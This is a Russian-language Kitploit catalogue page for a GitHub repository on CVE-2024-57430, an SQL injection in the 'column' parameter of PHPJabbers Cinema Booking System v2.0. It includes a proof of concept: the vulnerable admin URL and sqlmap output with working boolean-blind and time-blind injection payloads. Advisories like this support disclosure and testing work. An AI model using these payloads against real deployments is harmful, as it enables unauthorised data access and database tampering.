Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-57430 — CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 уязвим к SQL-инъекциям, что приводит к несанкционированному доступу к данным и повышению привилегий. | Kitploit
Инструменты/GitHubGitHub/ahrixia/cve-2024-57430
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 уязвим к SQL-инъекциям, что приводит к несанкционированному доступу к данным и повышению привилегий.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-57430

Уязвимость SQL-инъекции в функции pjActionGetUser системы PHPJabbers Cinema Booking System v2.0 позволяет злоумышленникам манипулировать запросами к базе данных через параметр column. Эксплуатация этой уязвимости может привести к несанкционированному раскрытию информации, повышению привилегий или манипуляции с базой данных.

Уязвимый параметр: column

Влияние:

SQL-инъекция может привести к несанкционированному доступу к конфиденциальной информации, изменению базы данных и даже полному компрометированию сервера базы данных. Это представляет критическую угрозу для конфиденциальности, целостности и доступности приложения.

Эксплойт - доказательство концепции (POC)

SQL-инъекция

GET-запрос по URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP по параметру column

root@kitploit:~
Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
Скачать инструмент